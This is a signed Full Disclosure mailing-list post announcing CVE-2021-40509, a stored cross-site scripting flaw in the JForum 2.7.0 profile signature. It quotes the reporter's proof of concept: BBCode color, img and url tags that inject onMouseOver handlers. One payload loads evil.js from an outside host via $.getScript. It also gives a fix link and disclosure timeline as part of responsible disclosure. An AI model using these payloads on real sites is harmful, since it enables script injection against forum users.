-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote: > hi, > > I found a vulnerability in the jforum 2.7.0. It is a storage cross site > script vulnerability. The place is the user's profile - signature. The > technique of the vulnerability is the same as that described in this > article "STORED CROSS SITE SCRIPTING IN BBCODE" ( > https://mindedsecurity.com/advisories/msa130510/), and the POC is: > > color tag: > [color=red" onMouseOver="alert('xss')]XSS[/color] > [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') > ;"]XSS[/color] > Renders into HTML: > <font onmouseover="alert('xss')" color="red">XSS</font> > <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" > color="red">XSS</font> > > img tag: > [img]/demo.jpg" onMouseOver="alert('xss')[/img] > Renders into HTML: > <img src="/demo.jpg" onmouseover="alert('xss')" alt="image"> > > url= tag: > [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url] > Renders into HTML: > <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" > target="_blank">test</a> > > through analysis, the forum has set the cookie to http-only, but the > attacker can use the $.getScript to do some evil things. > > this vulnerability has been fixed in > https://sourceforge.net/p/jforum2/code/934/ . > > timeline: > 2021-04-21 announce the developer of Jforum by e-mail > 2021-04-22 Jforum fixed the vulnerability, and will include this fix in > next release > 2021-09-02 send this mail to bugtraq&fulldisclosure
CVE-2021-40509 has been assigned for this vulnerability. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509 - -- Henri Salo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAmE3GGgACgkQJ633pE6q dXRbUA//fgeWQCIQzYDgZ6venNplzRBsCamTVWK2miur4NjIqKFtza4namiEn1GK 9+Fw4llZdmcdLV2iE5HVo1EPwg1RKgKqEFWlat8cLNWyzPFazh3Mv8gJgAAPnfgB HdODZGE8cXnTZ2nK1FZqTtGbh7vTcs9AlWzpEwZgZs+BzWzX6VO/gxC2iQcA4ePq 6/xKsUbO46SKZpZ+pZt45V9r4EcibgU69cXwtPeywE2NRjlM9VsReWz+p3CVR3Sv px6mK3G4sjyHyPIhkDwVMwUziPT5FfLuAPYI6VEweMsCUgyUfj48xu+pmTYwCQ1R 8LSjllEU2qsGvs0oMGs7AEp5T1c/kDP7xgS761gUivjl1J//szu+QScC0jKYVdEX DWp672UpzB3F4xsMTeQu7U7zq+NRS2ySNs3gB2cvqsjS8lDIMdrnThqZny/K7jhC TCrfTYDTsej1jlMWR3mTiFIhNNhPPoSg+Opab1wnqQwO3JIE9xVqNNTsyIH+aCMK jUlZZAbJwfb3WNJMJHI+9gxh1XgLf5NhgsSlzSpWcnM/soXOYzi3EdYlvuc0cTQ7 X3082dHC7A2Y1Lm9fTqvwsQ+BGV0rR8FxhwAfqweNz7AH5rAIbalj+mVFweSaUU/ k2Vd4Jt8QjfmzaTMMpLxUPjA3vlaIBxYnz/T33chZ119PRG9vNc= =fWS4 -----END PGP SIGNATURE----- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/